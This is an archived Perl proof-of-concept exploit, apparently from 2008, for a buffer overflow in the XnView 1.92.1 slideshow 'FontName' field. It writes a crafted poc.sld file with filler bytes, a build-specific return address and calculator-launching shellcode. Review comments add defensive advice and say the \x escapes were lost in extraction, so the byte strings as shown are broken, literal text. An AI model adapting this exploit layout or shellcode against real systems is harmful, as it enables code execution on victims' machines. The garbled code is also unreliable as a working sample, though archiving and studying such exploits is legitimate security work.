
xnview1921-overflow.txt

Posted on 03 April 2008

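#!/usr/bin/perl
# ================================================================
# XnView 1.92.1 Slideshow "FontName" Buffer Overflow
# ================================================================
#
# Calc execution POC Exploit for WinXP SP1 pro English
#
# Found by   : Stefan Cornelius, Secunia Research
# Advisory   : http://secunia.com/secunia_research/2008-6/advisory
#
# Exploit by : haluznik | haluznik<at>gmail.com
#
# 04.01.2008 ..April Fools Day ;)
# ================================================================
#
# Purpose: builds a slideshow file (poc.sld) whose FontName value is
# longer than the parser expects, to demonstrate the overflow described
# in the Secunia advisory above.
#
# NOTE(review): in this archived copy the backslashes of the \xNN escapes
# and the newlines inside the status messages were lost in extraction, so
# every string below is plain literal text. They are reproduced as found
# rather than reconstructed.
#
# Defensive reading: the trigger is an over-long FontName value in a
# slideshow file. Treat .sld files from untrusted sources as hostile on
# the affected version, and apply the vendor fix referenced by the
# advisory. The header ties the sample to one OS build (WinXP SP1 pro
# English), which suggests the embedded addresses are build-specific --
# confirm against the advisory before relying on that.

use strict;
use warnings;

print " [*] XnView 1.92.1 Slideshow exploit by haluznik ";

# File prologue. The hex digits spell out the slideshow header line
# followed by CR/LF and the opening of the field: FontName = "
my $head =
    "x23x20x53x6cx69x64x65x20x53x68" .
    "x6fx77x20x53x65x71x75x65x6ex63" .
    "x65x0dx0ax46x6fx6ex74x4ex61x6d" .
    "x65x20x3dx20x22";

# 32 filler characters followed by a four-byte value; presumably the
# value that lands on the overwritten control data (not verifiable from
# this listing alone).
my $fontname = "A" x 32 . "xccx59xfbx77";

# Payload; per the header it only launches the calculator as proof of
# code execution.
my $shellcode =
    "x33xc0x50x68x63x61x6cx63x54x5b" .
    "x50x53xb9x44x80xc2x77xffxd1x50" .
    "xbbxfdx98xe7x77xffxd3";

# File epilogue. The hex digits spell out the closing quote, CR/LF, one
# quoted image path entry ("C:\test.jpg") and a final CR/LF.
my $tail =
    "x22x0dx0ax22x43x3ax5cx74x65x73" .
    "x74x2ex6ax70x67x22x0dx0a";

my $sld = $head . $fontname . $shellcode . $tail;

print " [+] Creating poc.sld file.. ";

# Three-argument open with a lexical handle: the mode cannot be changed
# by the file name, and the handle does not leak into package scope.
open(my $out, '>', 'poc.sld') or die " [-] cannot write file ";
print {$out} $sld;

# Buffered write errors only surface at close, so check it.
close($out) or die " [-] cannot write file ";

print " [*] Done! ";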

 
